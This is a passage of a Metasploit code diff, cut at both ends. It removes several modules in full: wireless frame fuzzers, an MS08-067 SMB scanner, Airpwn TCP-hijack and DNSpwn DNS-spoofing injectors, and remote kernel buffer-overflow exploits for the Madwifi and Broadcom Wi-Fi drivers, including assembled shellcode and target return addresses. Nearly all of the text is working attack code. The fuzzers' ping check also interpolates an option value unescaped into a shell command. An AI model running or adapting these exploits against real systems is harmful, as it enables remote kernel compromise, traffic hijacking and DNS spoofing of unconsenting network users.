seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x04\x01" + # capability flags
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + channel.chr
return frame
end
end

View File

@ -1,33 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Test Module',
'Description' => %q{
This module is a test of the wireless packet injection system.
Please see external/ruby-lorcon/README for more information.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE
))
end
def run
open_wifi
wifi.write("X" * 1000)
end
end

View File

@ -1,127 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Beacon Frame Fuzzer',
'Description' => %q{
This module sends out corrupted beacon frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
end
def ping_check
1.upto(3) do |i|
x = `ping -c 1 -n #{datastore['PING_HOST']}`
return true if x =~ /1 received/
if (i > 1)
print_status("Host missed a ping response...")
end
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
else
frames.push(frame)
end
1.upto(3) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
print_status "****************************************"
print_status f.inspect
end
return
end
end
else
wifi.write(frame)
end
end
end
def create_frame
mtu = 1500 # 2312 # 1514
ies = rand(1024)
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
#"\x00\x05" + # capability flags
Rex::Text.rand_text(2) +
# ssid tag
"\x00" + ssid.length.chr + ssid +
# supported rates
"\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# current channel
"\x03" + "\x01" + channel.chr
1.upto(ies) do |i|
max = mtu - frame.length
break if max < 2
t = rand(256)
l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end

View File

@ -1,126 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wireless Probe Response Frame Fuzzer',
'Description' => %q{
This module sends out corrupted probe response frames.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptString.new('PING_HOST', [ false, "Ping the wired address of the target host"])
], self.class)
end
def ping_check
1.upto(3) do |i|
x = `ping -c 1 -n #{datastore['PING_HOST']}`
return true if x =~ /1 received/
if (i > 1)
print_status("Host missed a ping response...")
end
end
return false
end
def run
srand(0)
@@uni = 0
frames = []
open_wifi
print_status("Sending corrupt frames...")
while (true)
frame = create_frame()
if (datastore['PING_HOST'])
if (frames.length >= 5)
frames.shift
frames.push(frame)
else
frames.push(frame)
end
1.upto(10) do
wifi.write(frame)
if (not ping_check())
frames.each do |f|
print_status "****************************************"
print_status f.inspect
end
return
end
end
else
wifi.write(frame)
end
end
end
def create_frame
mtu = 500
ies = rand(1024)
bssid = Rex::Text.rand_text(6)
seq = [rand(255)].pack('n')
frame =
"\x50" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
Rex::Text.rand_text(2) + # beacon interval
Rex::Text.rand_text(2) # capability flags
ssid = Rex::Text.rand_text_alphanumeric(rand(256))
# ssid tag
frame << "\x00" + ssid.length.chr + ssid
# supported rates
frame << "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48"
# current channel
frame << "\x03" + "\x01" + channel.chr
1.upto(ies) do |i|
max = mtu - frame.length
break if max < 2
t = rand(256)
l = (max - 2 == 0) ? 0 : (max > 255) ? rand(255) : rand(max - 1)
d = Rex::Text.rand_text(l)
frame += t.chr + l.chr + d
end
return frame
end
end

View File

@ -53,7 +53,7 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res.nil? or res.body.empty? if res.nil? or res.body.empty?
vprint_error("#{peer} - No content retrieved from") vprint_error("#{peer} - No content retrieved")
return return
end end

View File

@ -1,120 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
require 'msf/core/module/deprecated'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Module::Deprecated
deprecated Date.new(2014, 2, 26), "exploit/windows/smb/ms08_067_netapi"
def initialize(info = {})
super(update_info(info,
'Name' => "MS08-067 Scanner",
'Description' => %q{
This module uses the check in ms08_067_netapi to scan for MS08-067.
},
'Author' => [
"hdm", # with tons of input/help/testing from the community
"Brett Moore <brett.moore[at]insomniasec.com>",
"frank2 <frank2@dc949.org>", # check() detection
"jduck", # XP SP2/SP3 AlwaysOn DEP bypass
"sho-luv", # Original module
"wvu" # Refactor and cleanup
],
'References' => [
["CVE", "2008-4250"],
["OSVDB", "49243"],
["MSB", "MS08-067"],
# If this vulnerability is found, ms08-67 is exposed as well
["URL", "http://www.rapid7.com/vulndb/lookup/dcerpc-ms-netapi-netpathcanonicalize-dos"]
],
'License' => MSF_LICENSE
))
register_options([
OptString.new("SMBPIPE", [true, "The pipe name to use (BROWSER, SRVSVC)", "BROWSER"])
], self.class)
end
def run_host(ip)
case check_vuln
when Msf::Exploit::CheckCode::Vulnerable
print_good("#{ip}:#{rport} - MS08-067 VULNERABLE")
report_vuln({
:host => ip,
:name => "MS08-067",
:info => "Vulnerability in Server service could allow remote code execution",
:refs => self.references
})
when Msf::Exploit::CheckCode::Safe
vprint_status("#{ip}:#{rport} - MS08-067 SAFE")
when Msf::Exploit::CheckCode::Unknown
vprint_status("#{ip}:#{rport} - MS08-067 UNKNOWN")
end
end
def check_vuln
begin
connect()
smb_login()
rescue Rex::Proto::SMB::Exceptions::LoginError
return Msf::Exploit::CheckCode::Unknown
end
#
# Build the malicious path name
# 5b878ae7 "db @eax;g"
prefix = "\\"
path =
"\x00\\\x00/"*0x10 +
Rex::Text.to_unicode("\\") +
Rex::Text.to_unicode("R7") +
Rex::Text.to_unicode("\\..\\..\\") +
Rex::Text.to_unicode("R7") +
"\x00"*2
server = Rex::Text.rand_text_alpha(rand(8)+1).upcase
handle = dcerpc_handle( '4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0',
'ncacn_np', ["\\#{datastore['SMBPIPE']}"]
)
begin
# Samba doesn't have this handle and returns an ErrorCode
dcerpc_bind(handle)
rescue Rex::Proto::SMB::Exceptions::ErrorCode
return Msf::Exploit::CheckCode::Safe
end
stub =
NDR.uwstring(server) +
NDR.UnicodeConformantVaryingStringPreBuilt(path) +
NDR.long(8) +
NDR.wstring(prefix) +
NDR.long(4097) +
NDR.long(0)
resp = dcerpc.call(0x1f, stub)
error = resp[4,4].unpack("V")[0]
# Cleanup
simple.client.close
simple.client.tree_disconnect
disconnect
if (error == 0x0052005c) # \R :)
return Msf::Exploit::CheckCode::Vulnerable
else
return Msf::Exploit::CheckCode::Safe
end
end
end

View File

@ -1,194 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'yaml'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'Airpwn TCP Hijack',
'Description' => %q{
TCP streams are 'protected' only in so much as the sequence
number is not guessable.
Wifi is shared media.
Got your nose.
Responses which do not begin with Header: Value assumed to be
HTML only and will have Header:Value data prepended. Responses
which do not include a Content-Length header will have one generated.
},
'Author' => ['toast', 'dragorn', 'ddz', 'hdm'],
'License' => MSF_LICENSE,
'Actions' =>
[
[ 'Airpwn' ]
],
'PassiveActions' =>
[
'Capture'
],
'DefaultAction' => 'Airpwn'
)
register_options(
[
OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement",
File.join(Msf::Config.data_directory, "exploits", "wifi", "airpwn", "sitelist.yml")
]),
OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]),
OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]),
OptString.new('MATCH', [ true, "Default request match", "GET ([^ ?]+) HTTP" ]),
OptString.new('RESPONSE', [ true, "Default response", "Airpwn" ]),
], self.class)
end
def run
@sitelist = datastore['SITELIST']
@regex = datastore['MATCH']
@response = datastore['RESPONSE']
@filter = datastore['FILTER']
@useyaml = datastore['USESITEFILE']
@http = []
if @useyaml then
begin
@http = YAML::load_file(@sitelist)
rescue ::Exception => e
print_error "AIRPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
end
else
@http[0] = { "regex" => [@regex], "response" => @response }
end
@run = true
print_status "AIRPWN: Parsing responses and defining headers"
# Prep the responses
@http.each do |r|
if not r["response"] then
if not r["file"] then
print_error "AIRPWN: Missing 'response' or 'file' in yaml config"
r["txresponse"] = ""
else
r["txresponse"] = ""
begin
File.open(r["file"], "rb") do |io|
r["txresponse"] += io.read(4096)
end
rescue EOFError
rescue ::Exception => e
print_error("AIRPWN: failed to parse response file " +
"#{r['file']}, #{e.class} #{e} #{e.backtrace}")
end
end
else
if r["file"] then
print_error "AIRPWN: Both 'response' and 'file' in yaml config, " +
"defaulting to 'response'"
end
r["txresponse"] = r["response"]
end
# If we have headers
if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0
# But not a content-length
if r["txresponse"].scan(/^Content-Length: /).size == 0
# Figure out the length and add it
loc = (/\n\n/m =~ r["txresponse"])
if loc == nil
print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is."
else
print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one."
r["txresponse"].insert(loc, "\r\nContent-Length: " + (r["response"].length - loc).to_s)
end
end
else
# We have no headers, generate a response
print_status "AIRPWN: Response packet has no HTTP headers, creating some."
r["txresponse"].insert(0, "HTTP/1.1 200 OK\r\nDate: %s\r\nServer: Apache\r\nConnection: close\r\nContent-Type: text/html\r\nContent-Length: %d\r\n\r\n" % [Time.now, @response.size])
end
end
print_status "Opening wifi module."
open_wifi
self.wifi.filter = @filter if (@filter != "")
each_packet do |pkt|
d3 = pkt.dot3
next if not d3
p = PacketFu::Packet.parse(d3) rescue nil
next unless p.is_tcp?
@http.each do |r|
hit = nil
r['regex'].each do |reg|
hit = p.payload.scan(/#{reg}/) || nil
break if hit.size != 0
end
next if hit.size.zero?
print_status("AIRPWN: %s -> %s HTTP GET [%s] TCP SEQ %u" % [p.ip_saddr, p.ip_daddr, $1, p.tcp_seq])
injpkt = Lorcon::Packet.new()
injpkt.bssid = pkt.bssid
response_pkt = PacketFu::TCPPacket.new
response_pkt.eth_daddr = p.eth_saddr
response_pkt.eth_saddr = p.eth_daddr
response_pkt.ip_saddr = p.ip_daddr
response_pkt.ip_daddr = p.ip_saddr
response_pkt.ip_ttl = p.ip_ttl
response_pkt.tcp_sport = p.tcp_dport
response_pkt.tcp_dport = p.tcp_sport
response_pkt.tcp_win = p.tcp_win
response_pkt.tcp_seq = p.tcp_ack
response_pkt.tcp_ack = (p.tcp_seq + p.ip_header.body.to_s.size - (p.tcp_hlen * 4)) & 0xffffffff
response_pkt.tcp_flags.ack = 1
response_pkt.tcp_flags.psh = 1
response_pkt.payload = r["txresponse"]
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
case pkt.direction
when ::Lorcon::Packet::LORCON_FROM_DS
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
when ::Lorcon::Packet::LORCON_TO_DS
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
else
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
end
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
response_pkt.tcp_seq = response_pkt.tcp_seq + response_pkt.payload.size
response_pkt.tcp_flags.ack = 1
response_pkt.tcp_flags.psh = 0
response_pkt.tcp_flags.fin = 1
response_pkt.payload = 0
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
self.wifi.inject(injpkt) or print_error("AIRPWN failed to inject packet: " + tx.error)
end
end
end
end

View File

@ -1,120 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'yaml'
require 'net/dns/packet'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Capture
include Msf::Exploit::Lorcon2
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'DNSpwn DNS Hijack',
'Description' => %q{
Race DNS responses and replace DNS queries
},
'Author' => ['dragorn'],
'License' => MSF_LICENSE
)
register_options(
[
OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement",
File.join(Msf::Config.data_directory, "exploits", "wifi", "dnspwn", "dnslist.yml")
]),
OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]),
OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]),
OptString.new('IP', [ true, "IP for host resolution", "1.2.3.4" ]),
OptString.new('DURATION', [ true, "Duration of spoofed IP record", "99999" ]),
OptString.new('MATCH', [ true, "Match for DNS name replacement", "(.*)"]),
], self.class)
end
def run
@dnslist = datastore['DNSLIST']
@regex = datastore['MATCH']
@response = datastore['IP']
@filter = datastore['FILTER']
@duration = datastore['DURATION']
@useyaml = datastore['USEDNSFILE']
@dns = []
if @useyaml
begin
@dns = YAML::load_file(@dnslist)
rescue ::Exception => e
print_error "DNSPWN: failed to parse YAML file, #{e.class} #{e} #{e.backtrace}"
end
else
@dns[0] = { "regex" => @regex, "response" => @response, "duration" => @duration }
end
@run = true
open_wifi
self.wifi.filter = @filter if not @filter.empty?
each_packet do |pkt|
d3 = pkt.dot3
next if not d3
p = PacketFu::Packet.parse(d3) rescue nil
next unless p.is_udp?
dns = Net::DNS::Packet::parse(p.payload) rescue nil
next unless dns
next if dns.answer.size != 0
next if dns.question.size == 0
@dns.each do |r|
hit = nil
r['regex'].each do |reg|
hit = dns.question[0].qName.scan(/#{reg}/) || nil
break if hit.size != 0
end
next if hit.size.zero?
print_status("DNSPWN: %s -> %s req %s transaction id %u (response %s)" % [p.ip_saddr, p.ip_daddr, dns.header.id, r["response"] ])
injpkt = Lorcon::Packet.new()
injpkt.bssid = pkt.bssid
response_pkt = PacketFu::UDPPacket.new
response_pkt.eth_daddr = p.eth_saddr
response_pkt.eth_saddr = p.eth_daddr
response_pkt.ip_saddr = p.ip_daddr
response_pkt.ip_daddr = p.ip_saddr
response_pkt.ip_ttl = p.ip_ttl
response_pkt.udp_sport = p.udp_dport
response_pkt.udp_dport = p.udp_sport
dns.header.qr = 1
dns.answer = Net::DNS::RR::A.new("%s %s IN A %s", dns.question[0].qName, r["duration"], r["response"])
response_pkt.payload = dns.data
response_pkt.recalc
injpkt.dot3 = response_pkt.to_s
if (pkt.direction == Lorcon::Packet::LORCON_FROM_DS)
injpkt.direction = Lorcon::Packet::LORCON_TO_DS
elsif (pkt.direction == Lorcon::Packet::LORCON_TO_DS)
injpkt.direction = Lorcon::Packet::LORCON_FROM_DS
else
injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS
end
self.wifi.inject(injpkt) or print_error("DNSPWN failed to inject packet: " + tx.error)
end
end
end
end

View File

@ -1,378 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Madwifi remote kernel exploit
# 100% reliable, doesn't crash wifi stack, can exploit
# same target multiple times
#
# Julien TINNES <julien at cr0.org>
# Laurent BUTTI <0x9090 at gmail.com>
#
# vuln in giwscan_cb, here's the path:
#
# ieee80211_ioctl_giwscan -> ieee80211_scan_iterate -> sta_iterate -> giwscan_cb
#
require 'msf/core'
require 'metasm'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Lorcon2
def initialize(info = {})
super(update_info(info,
'Name' => 'Madwifi SIOCGIWSCAN Buffer Overflow',
'Description' => %q{
The Madwifi driver under Linux is vulnerable to a remote kernel-mode
stack-based buffer overflow.
The vulnerability is triggered by one of these properly crafted
information element: WPA, RSN, WME and Atheros OUI Current madwifi
driver (0.9.2) and and all madwifi-ng drivers since r1504 are
vulnerable
Madwifi 0.9.2.1 release corrects the issue.
This module has been tested against Ubuntu 6.10 and is 100% reliable,
doesn\'t crash the Wifi stack and can exploit the same machine multiple
time without the need to reboot it.
This module depends on the Lorcon2 library and only works on the Linux
platform with a supported wireless card. Please see the Ruby Lorcon2
documentation (external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'Julien Tinnes <julien at cr0.org>',
'Laurent Butti <0x9090 at gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-6332'],
['OSVDB', '31267'],
['URL', 'http://www.madwifi.org']
],
#'Stance' => Msf::Exploit::Stance::Passive,
'Platform' => 'linux',
'Arch' => [ ARCH_X86 ],
'Payload' =>
{
#'Space' => 65,
# Metasploit doesn't support dynamic size payloads
# so we will handle this in metasm instead and ask for
# the smaller payload possible
#'Encoder' => Msf::Encoder::Type::Raw,
'DisableNops' => true
},
'Targets' =>
[
[ 'Ubuntu 6.10',
{
'JMPESP' => 0xffffe777,
'scan_iterate_ra' => "0x8014401"
}
],
[ 'Generic (you need non randomized vdso)',
{
'JMPESP' => 0xffffe777,
'scan_iterate_ra' => nil
}
]
],
'DisclosureDate' => 'Dec 08 2006'
))
register_options(
[
OptBool.new('SINGLESHOT', [ true, "Break after first victim (for msfcli)", 'false']),
OptString.new('SSID', [ true, "The SSID of the emulated access point", 'test']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 600]),
OptInt.new('LENGTH', [ true, "Length after local variables in giwscan_cb() to overwrite", 24]),
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF']),
], self.class)
end
def exploit
open_wifi
#puts "kikoo " + payload.encoded.inspect
#puts payload.encoded.to_s.unpack('C*').map { |i| i.to_s 16 }.join(',')
stime = Time.now.to_i
rtime = datastore['RUNTIME'].to_i
count = 0
print_status("Shellcode size is: #{payload.encoded.length} bytes")
print_status("Creating malicious beacon frame...")
frame = create_beacon()
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
while (stime + rtime > Time.now.to_i)
wifi.write(frame)
select(nil, nil, nil, 0.10) if (count % 100 == 0)
count += 1
break if session_created? and datastore['SINGLESHOT']
end
print_status("Completed sending #{count} beacons.")
end
def create_beacon
ssid = datastore['SSID'].to_s
bssid = Rex::Text.rand_text(6)
channel = datastore['CHANNEL'].to_i
len = datastore['LENGTH'].to_i
seq = [rand(255)].pack('n')
jmpesp = target['JMPESP'] # jmp esp in vdso
# address just after the call (in ieee80211_scan_iterate in wlan.ko)
scan_iterate_ra=target['scan_iterate_ra']
if scan_iterate_ra
howtoreturn = "RETURN_PROPERLY" # Return to the parent of giwscan_cb parent
else
howtoreturn = "RETURN_BADLY" # Return to userland with IRET
end
bssiwlist = 0x0804ddd0
stacksize = "STACK_8K"
getregs = "CALCULATE"
#getregs = "IWANTTOSCANMANUALLY"
reg_cs = "0x73"
reg_ss = "0x7b"
wiframe = Metasm::Shellcode.assemble Metasm::Ia32.new, <<EOS
#define #{stacksize} 1
#define #{getregs} 1
#define CS #{reg_cs}
#define SS #{reg_ss}
#define #{howtoreturn} 1
; chunk1
db 0, 0x50, 0xf2 ; wpa_oui
db 1 ; wpa_typ
db 1, 0 ; wpa_ver
back2:
;push 0x1C
;ret
;cld
#ifdef RETURN_PROPERLY
mov ebx, esp ; save esp
#endif
#ifdef IWANTTOSCANMANUALLY
mov eax, 4
checkforcs:
add esp, eax
cmp dword ptr [esp], 0x73 ; scan for cs
jnz checkforcs
cmp dword ptr [esp+12], 0x7b ; scan for ss
jnz checkforcs
mov edi, dword ptr [esp+8] ; put user stack address in edi
push edi
; NO SCAN, calculate the good value
#else
#ifdef STACK_8K
or esp, (0x2000-1) ; assume 8K stack
#else
or esp, (0x1000-1) ; assume 4K stack
#endif
sub esp, 0x17 ; cf return_from_syscall
mov edi, dword ptr [esp+8]
push edi
; IWANTTOSCANMANUALLY
#endif
; We can also go to BSS instead of stack
;mov edi, #{bssiwlist}
;push edi
call endsc
beginsc:
#if 0
call greetings
toto db "You're pwn3d :(\\n"
greetings:
mov eax, 4
mov ebx, 1
pop ecx
mov edx, (greetings - toto)
int 0x80
#endif
xor eax, eax
inc eax
inc eax
int 0x80 ; fork
cmp eax, 0
jnz doexit
;#include "/home/julien/Audit/metasploit3/modules/exploits/linux/madwifi/connectback.asm"
;; Metasploit's shellcode integration
; Old, bad method
;metasc db "#{payload.encoded.unpack('C*').map { |i| '\\x%02x' % i }.join}"
; this will be replaced by metasploit's payload
metasc:
; metasm will add padding here so that the next .offset is honored
.pad db 0x33
metascend:
doexit:
#if 1
; exit
xor eax, eax
inc eax
;mov ebx, 42
int 0x80
#endif
endsc:
pop esi
; let's copy the shellcode to userland
mov ecx, endsc - beginsc
rep movsb
#ifdef RETURN_PROPERLY
mov esp, ebx ; restore stack pointer
; If SCANFOR_SCAN_ITERATE defined
; scan for ieee80211_scan_iterate
; example address: e0b46401 (scan_iterate+0x11)
; It should be easier to use this if porting the exploit in a hurry
;#define SCANFOR_SCAN_ITERATE
#ifdef SCANFOR_SCAN_ITERATE
sub esp, 4 ; you can remove this in most cases
checkforretadd:
add esp, 4
mov ebx, dword ptr [esp+16] ; scan for return address, we know that we have
; four saved register before the return address
; (+16)
and ebx, 0x07FF
cmp ebx, #{scan_iterate_ra} & 0x07FF
jnz checkforretadd
;mov ebp, edi ; fixup EBP (cf end of ieee80211_ioctl_giwscan which will use it)
; we need a writeable address
#endif
; Here we know the stack layout and esp already has the correct value
pop ebx ; Well, no need to fixup EBP, just run
; sta_iterate epilogue, thanks Staphane Duverger,
; how could I miss that!
pop esi
pop edi
pop ebp
; release the locks
push esi ; save esi
mov eax, edi ; we use the fact that edi has the same value in ieee80211_ioctl_giwscan
; just before the call to i*_scan_iterate and in sta_iterate just before
; the ret
mov eax, [eax+0x978] ; cf. i*_scan_iterate
mov esi, [eax+8] ; cf. sta_iterate
xor eax, eax
inc eax
mov edx, eax
;xchg dl, [esi] ; already unlocked
xchg al, [esi+0x8C] ; release the lock!
pop esi
ret ; end of sta_iterate epilogue
; Else we don't return properly
#else
; we directly return from the syscall
iret
#endif
.offset 64*2+21
; chunk2
back1:
jmp.i back2
dd 0 ; this MUST be zero
; chunk3
dd 0, 0, 0, 0 ; end_buf, current_ev, ieee, iwscanreq
; chunk4
db #{len-6} dup(0x33)
;dd 0xffffe777 ; addr of 'jmp esp' in vdso page
dd #{jmpesp}
jmp.i8 back1
; assert
.offset 198
;.padto 198 ; assert
EOS
wiframe.encoded.patch("metasc", "metascend", payload.encoded)
value = wiframe.encode_string
#, 'monadresseip'=>(('172.24.94.252'.split('.').reverse.inject(0) { |ip, byte| (ip << 8) | byte.to_i }) ^ 0xffffffff)
#puts value[-10..-1].unpack('C*').map { |i| i.to_s 16 }.join(',')
if (len == 24 and value.length != 198)
fail_with(Failure::BadConfig, "Value is too big! #{value.length}")
end
buf = "\xdd" + value.length.chr + value
frame =
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
bssid + # src
bssid + # bssid
seq + # seq
Rex::Text.rand_text(8) + # timestamp value
"\x64\x00" + # beacon interval
"\x01\x00" + # capabilities
# ssid IE
"\x00" + ssid.length.chr + ssid +
# supported rates IE
"\x01\x08\x82\x84\x8b\x96\x0c\x18\x30\x48" +
# channel IE
"\x03" + "\x01" + channel.chr +
# invalid wpa IE buffer overflow
# wpa ie is an example, still valid for other IEs
buf
return frame
end
end

View File

@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free", 'Name' => "MS14-012 Microsoft Internet Explorer CMarkup Use-After-Free",
'Description' => %q{ 'Description' => %q{
This module exploits an use after free condition on Internet Explorer as used in the wild This module exploits an use after free condition on Internet Explorer as used in the wild
on the "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to as part of "Operation SnowMan" in February 2014. The module uses Flash Player 12 in order to
bypass ASLR and finally DEP. bypass ASLR and DEP.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>

View File

@ -1,199 +0,0 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = LowRanking
include Msf::Exploit::Lorcon2
include Msf::Exploit::KernelMode
def initialize(info = {})
super(update_info(info,
'Name' => 'Broadcom Wireless Driver Probe Response SSID Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Broadcom Wireless driver
that allows remote code execution in kernel mode by sending a 802.11 probe
response that contains a long SSID. The target MAC address must
be provided to use this exploit. The two cards tested fell into the
00:14:a5:06:XX:XX and 00:14:a4:2a:XX:XX ranges.
This module depends on the Lorcon2 library and only works on the Linux platform
with a supported wireless card. Please see the Ruby Lorcon2 documentation
(external/ruby-lorcon/README) for more information.
},
'Author' =>
[
'Chris Eagle', # initial discovery
'Johnny Cache <johnnycsh [at] 802.11mercenary.net>', # the man with the plan
'skape', # windows kernel ninjitsu and debugging
'hdm' # porting the C version to ruby
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2006-5882'],
['OSVDB', '30294'],
['URL', 'http://projects.info-pull.com/mokb/MOKB-11-11-2006.html'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500
},
'Platform' => 'win',
'Targets' =>
[
# 5.1.2600.2622 (xpsp_sp2_gdr.050301-1519)
[ 'Windows XP SP2 (5.1.2600.2122), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x8066662c, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dbb27,
}
}
}
],
# 5.1.2600.2180 (xpsp_sp2_rtm_040803-2158)
[ 'Windows XP SP2 (5.1.2600.2180), bcmwl5.sys 3.50.21.10',
{
'Ret' => 0x804f16eb, # jmp edi
'Platform' => 'win',
'Payload' =>
{
'ExtendedOptions' =>
{
'Stager' => 'sud_syscall_hook',
'PrependUser' => "\x81\xC4\x54\xF2\xFF\xFF", # add esp, -3500
'Recovery' => 'idlethread_restart',
'KiIdleLoopAddress' => 0x804dc0c7,
}
}
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2006'
))
register_options(
[
OptString.new('ADDR_DST', [ true, "The MAC address of the target system",'FF:FF:FF:FF:FF:FF']),
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60])
], self.class)
end
def exploit
open_wifi
stime = Time.now.to_i
print_status("Sending beacons and responses for #{datastore['RUNTIME']} seconds...")
while (stime + datastore['RUNTIME'].to_i > Time.now.to_i)
select(nil, nil, nil, 0.02)
wifi.write(create_response)
select(nil, nil, nil, 0.01)
wifi.write(create_beacon)
break if session_created?
end
print_status("Finished sending frames...")
end
def create_beacon
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton('FF:FF:FF:FF:FF:FF')
seq = [Time.now.to_i % 4096].pack('n')
blob = create_frame
blob[0,1] = 0x80.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src
blob[22,2] = seq
blob
end
def create_response
src = eton('90:e9:75:00:00:00') #relative jmp + 0x75 = stage2 HaHa. Tuned for ssid len = 93
dst = eton(datastore['ADDR_DST'])
seq = [Time.now.to_i % 256].pack('n')
blob = create_frame
blob[0,1] = 0x50.chr
blob[4,6] = dst
blob[10,6] = src
blob[16,6] = src # bssid field, good idea to set to src.
blob[22,2] = seq
blob
end
def create_frame
"\x80" + # type/subtype
"\x00" + # flags
"\x00\x00" + # duration
eton(datastore['ADDR_DST']) + # dst
"\x58\x58\x58\x58\x58\x58" + # src
"\x58\x58\x58\x58\x58\x58" + # bssid
"\x70\xed" + # sequence number
#
# fixed parameters
#
# timestamp value
